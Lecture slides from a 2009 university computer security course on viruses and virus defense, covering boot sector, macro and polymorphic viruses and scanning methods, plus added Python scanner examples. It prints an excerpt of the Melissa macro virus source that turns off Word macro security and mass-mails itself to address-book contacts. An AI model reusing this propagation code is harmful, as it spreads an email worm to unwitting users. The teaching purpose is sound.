CSE 127 Computer Security, Spring 2009
Malware I: Viruses and virus-defense
Stefan Savage
Many slides courtesy Carey Nachenberg
Recap
• Various ways to compromise software systems based on input and timing
  • Buffer overflows, format string errors, TOCTOU, SQL injection, XSS, etc.
• But once you’ve compromised a system, what does the malicious software do?
  • First: propagates itself to create an installed base
  • Today: viruses – the oldest mass malware
Reminder
You have a project due on Tuesday.
Viruses
• A computer virus is a (malicious) program
  • Attaches to a host program or data
  • Creates (possibly modified) copies of itself
  • Payload of program may have other effects (deleting files, opening backdoors, printing messages, etc.)
• Viruses traditionally require some user action to activate (i.e. execute some file, open some spreadsheet, etc.)
Virus Writer’s Goals
• Hard to detect
• Hard to destroy or deactivate
• Spreads infection widely/quickly
• Can reinfect a host
• Easy to create
Kinds of Viruses
• Boot Sector Viruses
  • Historically important, but less common today
• Memory Resident Viruses
  • Standard infected executable
• Macro Viruses
  • Embedded in documents (like Word docs)
• E-mail/IM Viruses
  • Spread via attachments
• Web platform viruses
  • Spread on Web sites (e.g. social net applications)
Boot sector Viruses (old school)
• Bootstrap Process:
  • Firmware (ROM) copies MBR (master boot record) to memory, jumps to that program
• MBR (or Boot Sector)
  • Fixed position on disk
  • “Chained” boot sectors permit longer Bootstrap Loaders
[Figure: boot chain MBR → boot → boot]
Boot sector Viruses
• Virus breaks the chain
• Inserts virus code
• Reconnects chain afterwards
[Figure: boot chain MBR → boot → virus → boot]
Why attack the Bootstrap?
• Automatically executed before OS is running
  • And thus, before detection tools are running
• OS hides boot sector information from users
  • Hard to discover that the virus is there
  • Harder to fix
• Any good virus scanning software scans the boot sectors
  • But good bootsector viruses may restore the good bootsector during normal operation (replace it when you log out or when anti-virus software isn’t running)
• Bootsector malware is back with a vengeance (Mebroot/Sinowal)
Virus Attachment to Host Code
[Figure: Original Program beside Modified Program with the virus code inserted at its beginning]
• Simplest case: insert copy at the beginning of an executable file
  • Runs before other code of the program
  • Historically most common program virus
• Runs before & after original program
  • Virus can clean up after itself
• Virus could modify code in place
  • Doesn’t change size, but could change behavior
  • Maybe harder to detect?
Macro Viruses
• Many applications support Macros
  • Macros are just programs
  • Word processors & Spreadsheets
• Startup macro
• Macros turned on by default
• Visual Basic Script (VBScript)
Melissa Macro Virus
• Implementation
  • VBA (Visual Basic for Applications) code associated with the "document.open" method of Word
• Strategy
  • Email message containing an infected Word document as an attachment (social engineering)
  • Opening the Word document triggers the virus if macros are enabled
  • Under certain conditions, it also attached documents created by the victim
Melissa Macro Virus: Behavior
• Setup
  • Lowers the macro security settings
    • Permits all macros to run without warning
  • Checks registry for key value “… by Kwyjibo”
    • HKEY_Current_User\Software\Microsoft\Office\Melissa?
• Propagation
  • Sends email message to the first 50 entries in every Microsoft Outlook MAPI address book readable by the user executing the macro
Melissa Macro Virus: Behavior
• Propagation Continued
  • Infects Normal.doc template file
  • Normal.doc is used by all Word documents
• “Joke”
  • If the minute matches the day of the month, the macro inserts the message “Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here.”
Melissa Virus Source Code (excerpt as shown on the slides)

```vb
' Melissa Virus Source Code (excerpt)
Private Sub Document_Open()
On Error Resume Next
' Setup: disable the macro-security UI and lower the security level
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
    CommandBars("Macro").Controls("Security...").Enabled = False
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
    CommandBars("Tools").Controls("Macro").Enabled = False
    Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
' Propagation: unless the registry marker is present, mail the document to
' the first 50 entries of every MAPI address book
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
    If UngaDasOutlook = "Outlook" Then
        DasMapiName.Logon "profile", "password"
        For y = 1 To DasMapiName.AddressLists.Count
            Set AddyBook = DasMapiName.AddressLists(y)
            x = 1
            Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
            For oo = 1 To AddyBook.AddressEntries.Count
                Peep = AddyBook.AddressEntries(x)
                BreakUmOffASlice.Recipients.Add Peep
                x = x + 1
                If x > 50 Then oo = AddyBook.AddressEntries.Count
            Next oo
            BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
            BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
            BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
            BreakUmOffASlice.Send
            Peep = ""
        Next y
        DasMapiName.Logoff
    End If
```
Melissa Virus
• Transmission Rate
  • The first confirmed reports of Melissa were received on Friday, March 26, 1999.
  • By Monday, March 29, it had reached more than 100,000 computers.
  • One site got 32,000 infected messages in 45 minutes.
• Damage
  • Denial of service: mail systems off-line.
  • Could have been much worse
• Remedy
  • Filter mail for virus signature (macro in .doc files)
  • Don’t run Macros in unknown documents by default
  • Clean Normal.doc
Detecting Viruses
• Scanning
• Integrity checking
• Heuristic detection
Virus Signatures
• Viruses can’t be completely invisible:
  • Code must be stored somewhere
  • Virus must do something when it runs
• Idea: look in files for “signature” byte sequences that are unique to the virus
• Issues
  • Where to scan (beginning of file, whole file, registry settings, etc.)
  • How to scan (look for “ILOVEYOU” string, or actually execute program)
  • How long to scan (tradeoffs in performance/coverage)
  • How to distinguish polymorphs (research issue)
The Simple Virus
[Figure: disassembly of the infected program and of the newly infected file at each step]
1. User runs an infected program.
2. Program transfers control to the virus.
3. Virus locates a new program.
4. Virus appends its logic to the end of the new file.
5. Virus updates the new program so the virus gets control when the program is launched.
Head/Tail Scanners
Most of these application-infecting viruses attached themselves to either the top or bottom of the host file, so anti-virus engineers built head/tail scanners.
[Figure: a host file with the virus at its head, and one with the virus at its tail]
The scanner loads the head and tail regions of the file into a buffer and then scans with a multi-string search algorithm.
So what do the bad guys do?
• Move the virus to the middle of the file
  • Becomes prohibitively expensive to scan
  • Must scan whole file
• Solution: scalpel scanning
  • Idea: limit scanning to likely entry-points for viruses
  • If you have more time you can also scan for more than just strings (regular expressions)
Scalpel Scanning
• Locate the main program entry-point.
• While the current instruction is a JUMP or a CALL instruction, trace it.
• If the current instruction is not a JUMP or CALL instruction, search for all fingerprints in this region of the file.
[Figure: the trace follows JMP → JMP → JMP and stops at the ADD in the listing below]

```asm
0100 EB04        JMP 106
0102 B021        MOV AL,21
0104 CD21        INT 21
0106 EB09        JMP 112
0108 B404        MOV AH,04
010A 891E9E02    MOV [029E],BX
010E B425        MOV AH,25
0110 B021        MOV AL,21
0112 E90200      JMP 117
0115 CD21        INT 21
0117 83C24F      ADD DX,+4F
011A 8BFA        MOV DI,DX
011C 81FF8000    CMP DI,0080
0120 725E        JB 0187
0122 7406        JZ 0131
0124 C606250273  MOV BYTE PTR [0225],73
0129 90          NOP
012A FEC5        INC CH
012C 7303        JNB 0138
012E 80C140      ADD CL,40
0132 B8010C      MOV AX,0C01
0135 8BD6        MOV DX,SI
0137 CD13        INT 13
```
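To make the signature, head/tail and scalpel slides concrete, here is an added example (not from the lecture slides): a toy scalpel scanner that traces the 8086 JMP/CALL chain from the entry point and then matches wildcard fingerprints only in the region where execution lands. The image and both fingerprints are constructed for the demo.

```python
# Added example (not from the lecture slides): a toy "scalpel scanner". It
# follows the 8086 JMP/CALL chain from the entry point of a .COM-style image
# and then searches only that region for hex fingerprints in which "??" is a
# one-byte wildcard. The image and the fingerprints are constructed for the demo.
import re

LOAD_ADDR = 0x100                            # .COM programs load at CS:0100h

def trace_entry(image: bytes, entry: int = 0, max_hops: int = 64) -> int:
    """Follow JMP rel8 (EB), JMP rel16 (E9) and CALL rel16 (E8) from `entry`
    and return the offset of the first instruction that is neither."""
    off = entry
    for _ in range(max_hops):
        if not 0 <= off < len(image):
            raise ValueError("trace left the file image")
        op = image[off]
        if op == 0xEB:
            off += 2 + int.from_bytes(image[off + 1:off + 2], "little", signed=True)
        elif op in (0xE9, 0xE8):
            off += 3 + int.from_bytes(image[off + 1:off + 3], "little", signed=True)
        else:
            return off
    raise ValueError("JMP/CALL chain too long (probably a loop)")

def compile_fingerprint(hexsig: str) -> re.Pattern:
    """Turn "B8 01 0C ?? ?? CD 13" into a bytes regex; "??" matches any byte."""
    toks = re.findall(r"\?\?|[0-9A-Fa-f]{2}", hexsig)
    return re.compile(b"".join(b"." if t == "??" else b"\\x%02x" % int(t, 16)
                               for t in toks), re.DOTALL)

def scalpel_scan(image: bytes, fingerprints: dict, window: int = 64) -> list:
    """Trace to the real code, then look for every fingerprint in that window."""
    start = trace_entry(image)
    region = image[start:start + window]
    hits = []
    for name, sig in fingerprints.items():
        m = compile_fingerprint(sig).search(region)
        if m:
            hits.append((name, LOAD_ADDR + start + m.start()))
    return hits

# Constructed image: the entry point jumps twice and then CALLs into the code
# that does the real work; a head scanner would only see the first few bytes.
IMAGE = bytes([
    0xEB, 0x04,              # 0100: JMP 0106
    0xB0, 0x21, 0xCD, 0x21,  # 0102: MOV AL,21 / INT 21  (skipped over)
    0xE9, 0x02, 0x00,        # 0106: JMP 010B
    0xCD, 0x21,              # 0109: INT 21              (skipped over)
    0xE8, 0x02, 0x00,        # 010B: CALL 0110
    0xC3, 0x90,              # 010E: RET / NOP
    0xB8, 0x01, 0x0C,        # 0110: MOV AX,0C01
    0x8B, 0xD6,              # 0113: MOV DX,SI
    0xCD, 0x13,              # 0115: INT 13
])
FINGERPRINTS = {                                  # both constructed for the demo
    "demo-disk-writer": "B8 01 0C ?? ?? CD 13",   # where execution actually lands
    "demo-head-only":   "B0 21 CD 21",            # sits in the head, never executed
}
```

The second fingerprint is present in the file but outside the traced region, which is exactly the trade-off the slide describes: scalpel scanning is cheap because it looks only where control flow goes.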
The Encrypted Virus
Soon after the first generation of executable viruses, virus authors began writing self-encrypting strains. These viruses carry a small decryption loop that runs first, decrypts the virus body and then launches the virus. Each time the virus infects a new file, it changes the encryption key so the virus body looks different.
[Figure: two infected hosts, each with a decryptor (Decrypt KEY1, Decrypt KEY2) followed by a differently encrypted body (Wjsvt, Uhqtr)]
The Encrypted Virus

```text
First infection                 Second infection
1. MOV DI, 120h                 1. MOV DI, 120h
2. MOV AX, [DI]                 2. MOV AX, [DI]
3. XOR AX, 0030h                3. XOR AX, 5132h
4. MOV [DI], AX                 4. MOV [DI], AX
5. ADD DI, 2h                   5. ADD DI, 2h
6. CMP DI, 2500h                6. CMP DI, 2500h
7. JNE 3                        7. JNE 3
8. PKEPAJHENZAW                 8. WJSVTPBMZPL
9. MNANTPOOTIZN                 9. NAADJGNANW
...                             ...
```

The decryption routine stays the same. Only the key(s) change. The encrypted body changes. Still easy to detect because the decryption loop stays the same.
The Polymorphic Virus
• Polymorphic viruses are self-encrypting viruses with a changing decryption algorithm
• When infecting a new file, such a virus:
  • Generates brand-new decryption code from scratch
  • Encrypts a copy of itself using a complementary encryption algorithm
  • Inserts both the new decryption code and the encrypted body of the virus into the target file
The Polymorphic Virus
[Figure: animation of the infection cycle in RAM, showing the host program, the decryption loop, the virus body and its mutation engine, and the new host program receiving a new decryption loop (Decryption Loop’)]
1. User executes program.
2. Virus decrypts itself.
3. Virus finds new program.
4. Mutation engine creates new decryptor.
5. Virus makes a new copy of itself and encrypts this copy.
6. Virus appends the new decryptor and encrypted virus body to the new file.
And we have a new infection!
The Polymorphic Virus
[Figure: two disassembly listings (address, machine code, mnemonic)]
Here we have a decryption loop from an MtE-based virus infection.
And here’s a second-generation decryption loop of the same virus strain.
Detecting The Polymorphic Virus
So how do we detect such a beast?
1. Use lots of wildcard strings/scripts:

```text
B98104%F%1BD????%FBE????%F%53142??%F??C0%F45%F??CC%FE2
B98104%8BB????%FBE????%F%53140??%F??C0%F43%F??CC%FE2
B98104%F%5BE????%F%53144??%F??C0%F46%F??CC%FE2
B98104%F%9BF????%F%53145??%F??C0%F47%F??CC%FE2
B98104%F%1BD????%FBF????%F%53143??%F??C0%F47%F??CC%FE2
B98104%8BB????%F%1BF????%F%53141??%F??C0%F47%F??CC%FE2
```

   The number of strings (algorithmic signatures) explodes quickly! Detecting the decryption loop is prone to false positives!
2. X-ray techniques (plaintext attack on encrypted virus body)
X-ray Scanning
Assume the file is infected and perform a plain-text attack on the encrypted virus code. This only works for simple schemes (but it’s often sufficient).

```text
Scanned file:      60 5C 5D 47 14 5D 47 14 55 14 40 51 47 40
Virus plain-text:  54 68 69 73 20 69 73 20 61 20 74 65 73 74
                   34 34 34 34 ...
```

The key must be 34! The scheme must be XOR!
[Figure: a host program with encrypted bytes appended; annotation: 7 bytes from EOF = “VIRUS”?]
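The known-plaintext check on the slide, worked through as an added example (not from the lecture slides). It assumes the body was encrypted byte-wise with a single 8-bit key under XOR, ADD or SUB; SCANNED and PLAIN are the slide’s bytes, while the sample file and its key are constructed.

```python
# Added example (not from the lecture slides): an "X-ray" known-plaintext check.
# Assuming the virus body was encrypted byte-wise with one 8-bit key under XOR,
# ADD or SUB, derive the key from the first byte pair and require that the same
# key explains every byte. SCANNED/PLAIN are the slide's bytes; the sample file
# and its key are constructed for the demo.

SCHEMES = {                                   # key recovered from one (cipher, plain) pair
    "XOR": lambda c, p: (c ^ p) & 0xFF,       # cipher = plain ^ key
    "ADD": lambda c, p: (c - p) & 0xFF,       # cipher = plain + key
    "SUB": lambda c, p: (p - c) & 0xFF,       # cipher = plain - key
}

def xray(scanned: bytes, plain: bytes):
    """Return (scheme, key) if one single-byte scheme maps `plain` onto the
    start of `scanned`; None if no scheme is consistent for every byte."""
    if not plain or len(scanned) < len(plain):
        return None
    for name, key_of in SCHEMES.items():
        key = key_of(scanned[0], plain[0])
        if all(key_of(c, p) == key for c, p in zip(scanned, plain)):
            return name, key
    return None

def xray_sweep(region: bytes, plain: bytes) -> list:
    """Slide the known plaintext over a region (e.g. a file tail) and report
    (offset, scheme, key) wherever a consistent key exists."""
    hits = []
    for off in range(len(region) - len(plain) + 1):
        found = xray(region[off:off + len(plain)], plain)
        if found:
            hits.append((off, *found))
    return hits

def xor_bytes(data: bytes, key: int) -> bytes:  # only used to build the sample
    return bytes(b ^ key for b in data)

# From the slide: ciphertext seen in the file and the known virus plaintext.
SCANNED = bytes.fromhex("60 5c 5d 47 14 5d 47 14 55 14 40 51 47 40")
PLAIN   = bytes.fromhex("54 68 69 73 20 69 73 20 61 20 74 65 73 74")  # "This is a test"

# Constructed sample: host bytes, the body under a different key, short trailer.
SAMPLE_FILE = b"MZ host code ......" + xor_bytes(PLAIN, 0xA7) + b"VIRUS\r\n"
```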
“Generic” Decryption
• Invented by Alan Solomon (a.k.a. Dr. Solomon)
  • Chose the name to obscure how it worked
• Assumptions
  • Virus gains control of the host immediately
  • Virus decrypts itself deterministically
  • Virus has some static body that can be detected with traditional signatures
• Key idea:
  • Emulate code execution until the virus decrypts itself
  • Typically use some sort of virtual machine (VM) environment
  • Search for signatures in memory
Generic Decryption
[Figure: the suspected program is loaded off disk into a virtual machine with a simulated OS and other data structures; as the decryption loop runs (1. fetch byte, 2. decrypt byte, 3. store byte, 4. loop to 1), the virus body and mutation engine appear in the region marked “Modified Memory”]
1. Load suspected program into VM.
2. Allow the program to execute normally.
3. “Tag” all modified memory as the program executes.